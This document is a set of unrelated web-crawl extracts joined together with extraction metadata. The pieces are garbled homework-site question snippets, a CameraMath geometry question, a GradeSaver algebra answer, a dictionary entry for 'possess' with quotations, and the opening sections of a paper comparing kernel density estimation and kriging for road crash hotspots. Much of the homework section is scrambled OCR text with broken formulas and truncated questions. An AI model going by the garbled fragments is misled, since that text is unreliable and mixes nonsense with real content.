{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26453641057014465, "perplexity": 6390.8560767357685}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247481994.42/warc/CC-MAIN-20190217132048-20190217154048-00380.warc.gz"}
https://solvedlib.com/n/lexxhibs-gixst-eowl-6ohz-elo-ens-j-e-asly-sekie-exrasid,3083019
5 answers ## Answers #### Similar Solved Questions 5 answers ##### 1. Fill in all the blank boxes with the appropriate chemical formula or properly spelled name. Only names and formulas written in the standard format (the format taught in this course) will be given credit. Latin names will not be given credit either. The response am expecting could be very different than what you might find even on reputable internet sites_ so make sure you use the knowledge YOu were taught in this course. Name all acids assuming they are under aqueous conditions: (2 points eac 1. Fill in all the blank boxes with the appropriate chemical formula or properly spelled name. Only names and formulas written in the standard format (the format taught in this course) will be given credit. Latin names will not be given credit either. The response am expecting could be very differen... 1 answer ##### .. Artists wages Wages of warehouse workers Gargands is a tacturer of greeting cards Cassily its... .. Artists wages Wages of warehouse workers Gargands is a tacturer of greeting cards Cassily its costs by matching the costs to the terms 1. Direct materials 2. Det er 3. Indiect materials 4. Indirect labor Other manang overhead e Paper d. Depreciation manufacturing equipment D . Manufacturing plant... 5 answers ##### The graph of the function f(z) 28 can be obtained from the graph of y f(z) by one of the following actions:shifting the graph of f(c) downwards 28 units shifting the graph of f(z) to the left 28 units shifting the graph of f(c) to the right 28 units shifting the graph of f(c) upwards 28 units The graph of the function f(z) 28 can be obtained from the graph of y f(z) by one of the following actions: shifting the graph of f(c) downwards 28 units shifting the graph of f(z) to the left 28 units shifting the graph of f(c) to the right 28 units shifting the graph of f(c) upwards 28 units... 1 answer How can I get the answer -1.25? Month QY Рx Ох PY $20 PZ$25 Qz 200 Jan 50 $10 100 Feb 90 25 225 10 18 60 Mar 70 275 10 15 90 25 25 290 Аpr May 12 50 15 100 15 25 320 25 15 120 Use the data from January and February. In the above table, the cross price elasticity of demand fo... 5 answers ##### Consider the following reaction: 5A+B+3€ 5 D+EThe following data was collected on the reaction:Trial[AJo 0.3 0.6 03 0.33[BJo[CJRate (Ws) 8.396 8.396 16.792 16.7920.48 0.48 0.96 0.480.3 0.3 0.3 0.6Two mechanisms are proposed:Mechanism 1:A + BY+CX+A+CD+22 +AMechanism 2:Sclecl answerA + (D-YStepY +B-€X+DStepX+A-CStep Which mechanism best fits the data? Seleci an SlepWhich Is most Ilikely the rate-determining step? Seleckan Consider the following reaction: 5A+B+3€ 5 D+E The following data was collected on the reaction: Trial [AJo 0.3 0.6 03 0.33 [BJo [CJ Rate (Ws) 8.396 8.396 16.792 16.792 0.48 0.48 0.96 0.48 0.3 0.3 0.3 0.6 Two mechanisms are proposed: Mechanism 1: A + B Y+C X+A+C D+2 2 +A Mechanism 2: Sclecl an... 1 answer ##### Three important things about the Central Limit Theorem? Two interesring things about Central Limit Theorem? ... Three important things about the Central Limit Theorem? Two interesring things about Central Limit Theorem? One question you still have about the Central Limit Theorem?... 1 answer ##### Ed COVID 19 Co has forecast sales to be$125,000 in February, $139,000 in March,$159,000... ed COVID 19 Co has forecast sales to be $125,000 in February,$139,000 in March, $159,000 in April, and$142,000 in May. The average cost of goods sold is 70% of sales. All sales are made on credit and sales are collected 70% in the month of sale, and 30% the month following. What is the budgeted Ac... 5 answers ##### Here is a graph of the function gUse the graph to find the following If there is more than one answer; separate them with commas.(a) All values at which g has a local minimum:DD(b) AIl Iocal minimum values of g: Here is a graph of the function g Use the graph to find the following If there is more than one answer; separate them with commas. (a) All values at which g has a local minimum: DD (b) AIl Iocal minimum values of g:... 5 answers ##### Pivot once as indicated in the given simplex tableau: Read the solution from the result:Pivot around the highlighted entry:(Simplify your answers _ Pivot once as indicated in the given simplex tableau: Read the solution from the result: Pivot around the highlighted entry: (Simplify your answers _... 1 answer ##### Home / study / science / physics / physics questions and answers / question 2 write... home / study / science / physics / physics questions and answers / question 2 write down the equations of motion of a bead on a wheel: (a) from the frame of the ... Question: Question 2 Write down the equations of motion of a bead on a wheel: (a) from the frame of the whe... Question 2 Write down th... 1 answer ##### Find the sum of the given vectors and illustrate geometrically. $\langle-1,4\rangle, \quad\langle 6,-2\rangle$ Find the sum of the given vectors and illustrate geometrically. $\langle-1,4\rangle, \quad\langle 6,-2\rangle$... 1 answer ##### How did organized labor began? how did organized labor began?... 1 answer ##### Consider X1,X2, , Xn be an iid random sample fron Unif(0.0). Let θ = (끄+1) Y where Y = max(X1, x... Consider X1,X2, , Xn be an iid random sample fron Unif(0.0). Let θ = (끄+1) Y where Y = max(X1, x. . . . , X.). It can be easily shown that the cdf of Y is h(y) = Prp.SH-()" 1. Prove that Y is a biased estimator of θ and write down the expression of the bias 2. Prove that &thet... 5 answers ##### Example 1.8 Two vectors are given by A = 31 - 2 j and B =- -4] - Calculate (a) A+B (b) :-B_ (e) I7+B. (4) |-B/. and (e) the direction of i+B and | - B: Example 1.8 Two vectors are given by A = 31 - 2 j and B =- -4] - Calculate (a) A+B (b) :-B_ (e) I7+B. (4) |-B/. and (e) the direction of i+B and | - B:... 5 answers ##### (alat 24) Rrtonkd an Kg ntn (o ohein Ih horizontal dlxance. Follocaing Isths Llnsa BEREOmerC HSl AToul Ru (miFuud Ihc thourctical projestilc Inge valuc o[ 45" dcurce Crtujr OAEr CUHAIEAIL FurR? Ilichi lmnc in Lz 45" €45 helaht in k45 cusr (alat 24) Rrtonkd an Kg ntn (o ohein Ih horizontal dlxance. Follocaing Isths Llnsa BEREOmerC HSl A Toul Ru (mi Fuud Ihc thourctical projestilc Inge valuc o[ 45" dcurce Crtujr OAEr CUHAIEAIL FurR? Ilichi lmnc in Lz 45" €45 helaht in k45 cusr... 5 answers 1 answer ##### A bake shop wants toknow if there is a relationship between age and favorite flavor ofbundt cake. If there are differences, they will use thatinformation to inform their marketing strategies.A representativesample of 100 customers the bake shop was surveyed. Eachparticipant was asked for their age (in years) and favorite flavorof bundt cake from the following options: red velvet, lemon,chocolate chip.Age in years is a [Select ] ["categorical", "quantitative"] variable.Favorit A bake shop wants to know if there is a relationship between age and favorite flavor of bundt cake. If there are differences, they will use that information to inform their marketing strategies. A representative sample of 100 customers the bake shop was surveyed. Each participant was asked for their... 5 answers ##### Choose the correct sequence of amino acidsHO_CHH,cHCH,cTmp- Thr- LeuCH,CH;CHgThr-Im-I Choose the correct sequence of amino acids HO_ CH H,c HC H,c Tmp- Thr- Leu CH, CH; CHg Thr-Im-I... 1 answer 4 answers ##### Problem 2: Find the eigenvalues and eigenfunctions of the following singular Sturm-Liouville problem, and work out the eigenfunction expansion of the given function f. (4 _ x2)y" 2xy" + Ay = 0 y(-2) is bounded,y(2) is boundedf(x) = 5 - 2x Problem 2: Find the eigenvalues and eigenfunctions of the following singular Sturm-Liouville problem, and work out the eigenfunction expansion of the given function f. (4 _ x2)y" 2xy" + Ay = 0 y(-2) is bounded,y(2) is bounded f(x) = 5 - 2x... 1 answer ##### What is an intertidal zone? What is an intertidal zone?... 1 answer ##### The percent distribution of live multiple delivery births(3 or more babies) in a particular year for... the percent distribution of live multiple delivery births(3 or more babies) in a particular year for women 15 to 54 years old is shown in the pie chart. find each probability. Number of Multiple Births 15-19 1.3%) 1120-24 8.5% 125-29:21.4 111 4644 53... -- 0.027218--
2022-10-05 08:29:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35994017124176025, "perplexity": 5190.633210150046}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00556.warc.gz"}
https://cameramath.com/es/expert-q&a/Algebra/4-Directed-ling-segment-PT-has-endpoints-whose-coordinates-are-P-5
### ¿Todavía tienes preguntas de matemáticas? Pregunte a nuestros tutores expertos Algebra Pregunta 4. Directed ling segment PT has endpoints whose coordinates are P(5, $$- 1 )$$ and T( $$- 5$$ , 3), Determine and state the coordinates of the J that divides the segment in a ratio of $$1 : 3$$ . the slope=-$$\frac{2}{5}$$ Solución View full explanation on CameraMath App.
2022-05-21 15:09:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.62917160987854, "perplexity": 8901.46871723368}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662539131.21/warc/CC-MAIN-20220521143241-20220521173241-00565.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/algebra-1-common-core-15th-edition/chapter-5-linear-functions-mid-chapter-quiz-page-321/9
## Algebra 1: Common Core (15th Edition) Let's try to get the equation into $ax + by +c = 0$ form. $-3x - 35y - 14 = 0$ $3x + 35y + 14 = 0$ Since there is a constant after $3x + 35y$, the equation is not direct variation.
2020-06-04 15:29:51
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7870745062828064, "perplexity": 821.2050267810484}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347441088.63/warc/CC-MAIN-20200604125947-20200604155947-00091.warc.gz"}
http://www.finedictionary.com/possess.html
# possess ## Definitions • THE MAN POSSESSED BY DEVILS • WordNet 3.6 • v possess have ownership or possession of "He owns three houses in Florida","How many cars does she have?" • v possess have as an attribute, knowledge, or skill "he possesses great knowledge about the Middle East" • v possess enter into and control, as of emotions or ideas "What possessed you to buy this house?","A terrible rage possessed her" • *** Map Showing Routes of Cartier, Champlain, and La Salle, also French and English Possessions at the Time of the Last... Self-possession of Fabricius, the Ambassador, under rather Trying Circumstances Webster's Revised Unabridged Dictionary • Interesting fact: Anti-modem laws restrict Internet access in the country of Burma. Illegal possession of a modem can lead to a prison term. • Possess To enter into and influence; to control the will of; to fill; to affect; -- said especially of evil spirits, passions, etc. "Weakness possesseth me.""Those which were possessed with devils.""For ten inspired, ten thousand are possessed ." • Possess To have the legal title to; to have a just right to; to be master of; to own; to have; as, to possess property, an estate, a book. "I am yours, and all that I possess ." • Possess To obtain occupation or possession of; to accomplish; to gain; to seize. "How . . . to possess the purpose they desired." • Possess To occupy in person; to hold or actually have in one's own keeping; to have and to hold. "Houses and fields and vineyards shall be possessed again in this land.""Yet beauty, though injurious, hath strange power, After offense returning, to regain Love once possessed ." • Possess To put in possession; to make the owner or holder of property, power, knowledge, etc.; to acquaint; to inform; -- followed by of or with before the thing possessed, and now commonly used reflexively. "I have possessed your grace of what I purpose.""Record a gift . . . of all he dies possessed Unto his son.""We possessed our selves of the kingdom of Naples.""To possess our minds with an habitual good intention." • *** Century Dictionary and Cyclopedia • possess To own; have as a belonging, property, characteristic, or attribute. • possess To seize; take possession of; make one's self master of. • possess To put in possession; make master or owner, whether by force or legally: with of before the thing, and now generally used in the passive or reflexively: as, to possess one's self of another's secret; to be or stand possessed of a certain manor. • possess To have and hold; occupy in person; hence, to inhabit. • possess To occupy; keep; maintain; entertain: mostly with a reflexive reference. • possess To imbue; impress: with with before the thing. • possess To take possession of; fascinate; enthrall; affect or influence so intensely or thoroughly as to dominate or overpower: with with before the thing that fills or dominates. • possess To have complete power or mastery over; dominate; control, as an evil spirit, influence, or passion: generally in the passive, with by, of, or with. • possess To put in possession of information; inform; tell; acquaint; persuade; convince. • possess To attain; achieve; accomplish. • possess Synonyms Have, Possess, Hold, Own, Occupy. Have is the most general of these words; it may apply to a temporary or to a permanent possession of a thing, to the having of that which is one's own or another's: as, to have good judgment; to have another's letter by mistake. Possess generally applies to that which is external to the possessor, or, if not external, is viewed as something to be used: as, to possess a library; if we say a man possesses hands, we mean that he has them to work with; to possess reason is to have it with the thought of what can be done with it. To hold is to have in one's hands to control, not necessarily as one's own: as, to hold a fan or a dog for a lady; to hold a title-deed; to hold the stakes for a contest. To own is to have a good and legal title to; one may own that which he does not hold or occupy and cannot get into his possession, as a missing umbrella or a stolen horse. Occupy is chiefly physical: as, to occupy a house; one may occupy that which he does not own, as a chair, room, office, position. • possess Holding Corioli in the name of Rome. • *** Chambers's Twentieth Century Dictionary • v.t Possess poz-zes′ to have or hold as an owner: to have the control of: to inform: to seize: to enter into and influence: to put (one's self) in possession (of): : • v.t Possess poz-zes′ (Spens.) to achieve • v.t Possess poz-zes′ (Shak.) put in possession of information, convince • *** ## Quotations • Dale Carnegie “Most of us have far more courage than we ever dreamed we possessed.” • Napoleon Hill “When your desires are strong enough you will appear to possess superhuman powers to achieve.” • Kahlil Gibran “You give but little when you give of your possessions. It is when you give of yourself that you truly give.” • Democritus “Happiness resides not in possessions, and not in gold, happiness dwells in the soul.” • Daphne Du Maurier “Happiness is not a possession to be prized. It is a quality of thought, a state of mind.” • Young “An idea discovered is much better possessed.” ## Etymology Webster's Revised Unabridged Dictionary L. possessus, p. p. of possidere, to have, possess, from an inseparable prep. (cf. Position) + sedere, to sit. See Sit Chambers's Twentieth Century Dictionary Fr.,—L. possidēre, possessum. ## Usage ### In literature: They entered in, and dwelt together: and the second possession was worse than the first. "Critical and Historical Essays, Volume III (of 3)" by Thomas Babington Macaulay The vote of the West, during this struggle, was of the first importance, as it possessed the balance of power, and could turn the scale at will. "Cotton is King and The Pro-Slavery Arguments" by Various What a blessing it is to possess such steadiness of nerve! "The Land of Thor" by J. Ross Browne He turned pale, but soon regained his self-possession. "The Cryptogram" by James De Mille Such a mind the world does not possess. "Epistle Sermons, Vol. II" by Martin Luther The Papacy, then in possession of supremacy over the world, made common cause with royalty. "A History of England Principally in the Seventeenth Century, Volume I (of 6)" by Leopold von Ranke He had something to lose which he was afraid of losing, which he was not sure even of possessing. "The Rainbow" by D. H. (David Herbert) Lawrence Scarcely one seemed to possess the incentive to breathe a whisper. "The Story of the Great War, Volume II (of VIII)" by Various His nose possessed that wonderful aquilinity associated with the highest type of Indian. "The Twins of Suffering Creek" by Ridgwell Cullum There are indeed few animals who possess so many tricks of all kinds to gain possession of their prey. "The Industries of Animals" by Frédéric Houssay But why does she not possess it herself? "The History of Woman Suffrage, Volume IV" by Various Like the latter it is specialized for sexual irritation and possesses very sensitive nerves. "The Sexual Question" by August Forel Jim gave him a quick glance as he moved across the room and possessed himself of the remaining pistol. "The One-Way Trail" by Ridgwell Cullum Remember, 'He who gains the youth, possesses the future,' as the saying goes. "Carmen Ariza" by Charles Francis Stocking I was a girl, inexperienced, innocent of coquetry, and yet I possessed all the instincts of a woman. "Beyond the Frontier" by Randall Parrish Probably all think it so but those who possess, or fancy they possess, it. "Shirley" by Charlotte Brontë The principal members of our government should possess the highest stamp of character, for never did there exist a purer people. "A Rebel War Clerk's Diary at the Confederate States Capital" by John Beauchamp Jones And such minds are possessed of all the power of the province. A fresh feeling of shame took possession of Leo. "The Undying Past" by Hermann Sudermann To make doubly secure their possession of Hill 304, the French pushed on beyond it for a distance of about a mile and a quarter. "The Story of the Great War, Volume VII (of VIII)" by Various *** ### In poetry: The star of the unconquered will, He rises in my breast, Serene, and resolute, and still, And calm, and self-possessed. "The Red Planet Mars" by Henry Wadsworth Longfellow My ancient friends were gone; Another race possess'd the walls, And I was left alone! "A Tale" by John Logan When sinners fall, the righteous stand, Preserved from every snare; They shall possess the promised land, And dwell for ever there. "Psalm 37 part 2" by Isaac Watts If I possessed such wondrous wings, I would soar and sing to heaven, Till my freed soul from sordid things, Should thus be widely riven. "Of A Skylark" by James Avis Bartley This night, vain fool, thy soul must pass Into a world unknown; And who shall then the stores possess Which thou hast called thine own. "The Worldling" by John Newton Sinne being gone, oh fill the place, And keep possession with thy grace; Lest sinne take courage and return, And all the writings blot or burn. "Good Friday" by George Herbert ### In news: Natasha Calis, Jeffrey Dean Morgan and Kyra Sedgwick celebrate at the Lure afterparty in Hollywood for Lionsgate's "The Possession.". Lionsgate's "The Possession" is a chilling scarer, but guests enjoyed a low-key evening at the movie's Hollywood premiere. School custodian charged with possessing child porn. A custodian at an elementary school on Long Island is under arrest Tuesday, charged with possession of child pornography. AP File Photo A Toms River school custodian was charged with possession and distribution of child pornography. Metalix was born in 1990 when an unholy spirit possessed Uncle Nasty then compelled him to play underground metal on the airwaves of Denver's KBPI radio. A Mexican woman has been arrested at the southern Arizona border for allegedly possessing animal tranquilizers often used in the commission of " date rape " sexual assaults. The Possession is supposedly based on a true story. Brian Donoher, Kettering Fairmont High School athletic director was charged with soliciting a prostitute, a third-degree misdemeanor, and possessing a criminal tool, a first-degree misdemeanor. MLive.com File Would you vote yes or no on a proposal to decriminalize marijuana possession and use in Grand Rapids. After months of discussion and weeks of debate, Chicago's move to decriminalize low-level marijuana possession sails through City Council with virtually no dissent. New York's Republicans have shot down a bill that would have decriminalized the public possession of nearly an ounce of marijuana. A bill decriminalizing possession of up to a half ounce of marijuana has advanced with bipartisan support in the New Jersey Legislature. TRENTON — An Assembly panel is set to hear a bill Monday that would decriminalize possession of small amounts of marijuana, making the offense similar to a parking violation. Detroit voters looking to weigh in a ballot proposal that would decriminalize possession of a small amount of marijuana may have to keep waiting. *** ### In science: They have as typical fibre a usual vector space, and possess local trivializations with suitable properties. Locally trivial quantum vector bundles and associated vector bundles It has long been known that supernova remnants (SNRs) possess magnetic fields. OH Zeeman Magnetic Field Detections Toward Five Supernova Remnants Using the VLA The Sch¨odinger equation for an oscillator possesses two parameters – the energy E and the cyclic frequency ω . Dyon-Oscillator Duality If M is an arbitrary manifold, the vector bundle T M × R → M possesses a natural Lie algebroid structure. Generalized Lie bialgebroids and Jacobi structures Let us suppose there exists an action ˜A[H ] which possesses the vacuum solution Hv and describes well-defined space-time dynamics of H . Point particle in general background fields and generalized equivalence principle These field theories possess nontrivial classical solutions . Conformal field theory, boundary conditions and applications to string theory The N = 1 Virasoro algebra also possesses a geometric interpretation. Conformal field theory, boundary conditions and applications to string theory Rational VOAs possess two surprising properties : The homogeneous subspaces M(n) of the representation spaces M are finite-dimensional, and there are only finitely many inequivalent irreducible representations. Conformal field theory, boundary conditions and applications to string theory Superconformal chiral CFTs with N = 2 supersymmetry possess in addition at least one more simple current, which we call s. Conformal field theory, boundary conditions and applications to string theory Note that the horizontal row sequences possess periods 3n . Exact solutions to chaotic and stochastic systems Note that only a nonsingular bicomplex number can possess an inverse. Bicomplex algebra and function theory We always assume that the C ∗ -algebras possess a unit 1. Charakterizations of the Generators of Positive Semigroups on C*- and von Neumann Algebras The term Schmidt correlated refers to any density matrix or set of density matrices which have eigenvectors possessing the same Schmidt basis. Optimal local discrimination of two multipartite pure states It is nondegenerate almost surely and it possesses a natural volume element induced by the standard metric in RPn . SU(1,1) Random Polynomials The CP 1 -submodel possesses an infinite number of conserved currents and a wide class of exact solutions. Integrable Submodels of Nonlinear $\sigma$-models and Their Generalization ***
2019-11-17 15:55:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3265584111213684, "perplexity": 13186.195168566668}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496669183.52/warc/CC-MAIN-20191117142350-20191117170350-00247.warc.gz"}
https://www.springerprofessional.de/identification-of-crash-hotspots-using-kernel-density-estimation/10911522?fulltextView=true
Skip to main content main-content powered by ## Weitere Artikel dieser Ausgabe durch Wischen aufrufen 01.06.2015 | Ausgabe 2/2015 Open Access # Identification of crash hotspots using kernel density estimation and kriging methods: a comparison Zeitschrift: Journal of Modern Transportation > Ausgabe 2/2015 Autoren: Lalita Thakali, Tae J. Kwon, Liping Fu ## 1 Introduction Identification of hotspots is a systematic process of detecting road sections that suffer from an unacceptable high risk of crashes. It is a low-cost strategy in road safety management where a small group of road network locations is selected from a large population for further diagnosis of specific problems, selection of cost-effective countermeasures, and prioritization of treatment sites. These identified sites are often known by various terms in literature, such as hazardous locations, hotspots, black spots, priority investment locations, collision-prone locations, or dangerous sites. There are various approaches that are aimed at identifying hotspots. One of the well-known approaches is using statistical crash models. This approach focuses on relating crashes as a function of potential variables such as road characteristics, traffic level, and weather factors using historical records [ 15] and subsequently uses these models to identify relatively high-risk sections. The other alternative approach is a geostatistical technique. This technique differs from the previous approach by considering the effects of unmeasured confounding variables through the concept of spatial autocorrelation between the crashes event over a geographical space. The focus of this study is to identify crash hotspots using the latter approach. Here, two distinctive geostatistical methods are evaluated and compared: one is the most widely used kernel density estimation (KDE) method and the other is the kriging method. The paper is arranged as follows. The following section provides a review of the existing literature on hotspot identification. It is followed by a description of the study methodology with a brief background of the KDE and kriging methods. Then, detailed findings and comparisons are presented in the Results and Discussions section. Lastly, conclusions are made in the last section. ## 2 Literature review Hotspots, which are defined as relatively high-risk locations, are commonly identified on the basis of some specific selection criteria. Many different methodologies and criteria have been developed for improving the accuracy of the hotspot identification process, thus the cost-effectiveness of a safety improvement program [ 6]. One of the most commonly used selection criteria is defined by the expected collision frequencies at the sites of interest. This particular criterion emphasizes on maximizing the system-wide benefits of safety intervention targeted to the hotspots, whereas another commonly implemented criterion is considering the expected collision rate (i.e., expected collision frequency normalized by traffic exposure) which emphasizes on individual road user’s equity perspective [ 7]. The expected collision frequency at a site is commonly estimated using a collision model-based approach, in which collision frequency is statistically modeled as a function of some relevant features such as road characteristics, traffic exposure, and weather factors [ 15]. Roads are normally divided into homogenous sections of equal length and intersections as spatial analysis units. Various count models, with negative binomial (NB) being the most popular, are used to estimate the expected number of crashes over the road network in a study area, and the estimates are subsequently compared with a pre-specified threshold value for determining if a site belongs to a hotspot. Note that the NB models are normally used in empirical Bayes (EB) framework to better capture the local experience of safety levels [ 1, 6]. One of the most critical parts of this modeling approach is the assumption of a probability distribution for crash count and the functional specification of the model parameters. If these components are incorrectly specified, applying such count models could lead to incorrect hotspots. In addition, this approach is data intensive and requires significant effort in collecting and processing the related data and calibrating the corresponding models [ 8]. The expected crash frequency could also be estimated using a geostatistical technique by considering the effects of unmeasured confounding variables through the concept of spatial autocorrelation between the crash events over a geographical space [ 913]. KDE is an example which has been used in road safety to study the spatial pattern of crash and identify the hotspots [ 812]. Similarly, there are other geostatisical methods such as clustering methods that evaluate relative risk based on their degree of association with its surroundings. Examples of these methods used in road safety studies are K-mean clustering [ 14, 15], nearest neighborhood hierarchical (NNH) clustering [ 1618], Moran’s I Index, and Getis-Ord Gi statistics [ 1921]. Anderson et al. [ 11] applied KDE method in the City of Afyonkarahisar, Turkey. In this study, the authors were able to detect highly crash risk sections which were highly concentrated in road intersections. Similarly, Keskin et al. [ 13] and Blazquez and Celis [ 12] used KDE and Moran’s Index method to observe temporal variation of hotspots across the road network. Khan et al. [ 21] used Getis-Ord Gi statistics to explore the spatial pattern of weather-related crashes, specifically crashes related to rain, fog, and snow conditions. A special pattern was revealed for each category of weather conditions which further suggested the need of prioritizing the treatments based on different weather conditions and locations. Pulgurtha et al. [ 9], Pulugurtha and Vanapalli [ 22], and Ha and Thill [ 23] employed KDE method to investigate the spatial variation of pedestrian crashes and hazardous bus stops. These studies have shown the potential to effectively and economically address pedestrian and passenger safety issues. Another study by Levine [ 17] and Kundakci and Tuydes-Yaman [ 18] used NNH clustering method to detect crash hotspots across the road network. A noticeable difference in aforementioned geostatistical methods is how spatial correlations are considered. For example, in the KDE method, a symmetrical kernel function, which is a function of bandwidth, is placed on each crash point generating a smooth intensity surface. Then, for a given point of interest, the crash intensity is a summation of the entire overlapping surface due to the crashes. In contrary, in the clustering technique such as NNH, a threshold value, which determines the extent of clustering in the neighborhood, is pre-specified. If the distance between crash data point pairs is smaller than the threshold value, then these crashes are grouped into the same cluster. Additional criteria such as minimum number of points to be in a cluster can also be specified. This variation in allocating different weights to the crashes occurring in its neighborhood (e.g., KDE method) or simply grouping crashes into certain clusters clearly indicates that these techniques are likely to have different results in terms of size, shape, and location of hotspots. One of the attractive parts of the KDE method as compared to other variants of clustering methods is that it takes into consideration of spatial autocorrelation of crashes (see Sect.  4.1 for more detailed explanations). Moreover, this method is simple and easy to implement. This could be one of the reasons that KDE method is being widely used in road safety. In the past efforts on geostatistical based methods, another popular technique called kriging has been rarely explored in road safety analysis. As one of the most advanced interpolation methods, kriging has been utilized widely across many different fields of studies in necessity of spatial prediction. With little prior information, this technique is able to provide a best linear unbiased estimator (BLUE) for variables that have tendency to vary over space [ 24, 25]. ## 3 Study area and data description The region of interest for this study is Hennepin County, Minnesota, which encloses the City of Minneapolis, the 14th largest metropolitan area in the United States Census Bureau [ 26]. The county has a dense road network with high crash potentials, making it an ideal location for the intended study. The study is based on historical crash data from 2003 to 2007 occurring in major highways, as depicted in Fig.  1. These crash data were originally collected by Minnesota Police Department, and maintained and archived by the Department of Transportation of Minnesota (Mn/DOT). The crashes in the dataset were already geocoded and included some important information such as severity of crashes (i.e., fatality, injury (three different categories) and property damage only), and weather conditions at the time of crashes. Figure  2 shows that more than two-third of crashes occurred in clear weather conditions. Similarly, more than two-third of crashes were property damage only. The time-of-day that each crash occurred is also known from the dataset, which gives an opportunity to explore temporal trend of hotspots patterns across the highway network. Figure  3 shows total number of crashes that occurred within 5 years of time period based on different times of day. Relatively, the morning crashes are concentrated from a time period of 7–9 AM and evening crashes from 4 to 6 PM. Therefore, we categorized crashes as morning peak hours (7–9 AM), evening peak hours (4–6 PM), and rest as off peak hours. A total of 38,748 crashes were recorded for 5 years, where 5,331 crashes occurred in morning peak, 7,712 in evening peak, and 25,705 in off peak hour. From Fig.  4, it is clear that the peak hours have higher rate of crashes (i.e., per year per hour) than the off peak, which could be due to higher traffic exposures. ## 4 Methodology Figure  5 presents an outline of methodology for the intended study. As mentioned previously, two geostatistical methods, KDE and kriging methods, were used to estimate crash intensity over the whole region. A brief description of each method is presented in Sects. 4.1 and 4.2. Following the crash estimation, a buffer of 400 m on either side of the highways was used to demarcate the estimated outputs from the two methods. A primary intent of choosing a buffer size of 400 m was to match a predefined spatial analysis unit, which was used to aggregate and produce the resulting outputs (i.e., estimates of crashes) from the two methods considered in this study. In addition, other areas that do not enclose highway segments are less likely (or unlikely) to have any record of crashes; therefore excluding those areas from the analysis was deemed inevitable by considering only the buffered areas. In a real-world application, use of 400 m can be considered reasonable for carrying safety treatments and providing sufficient precision 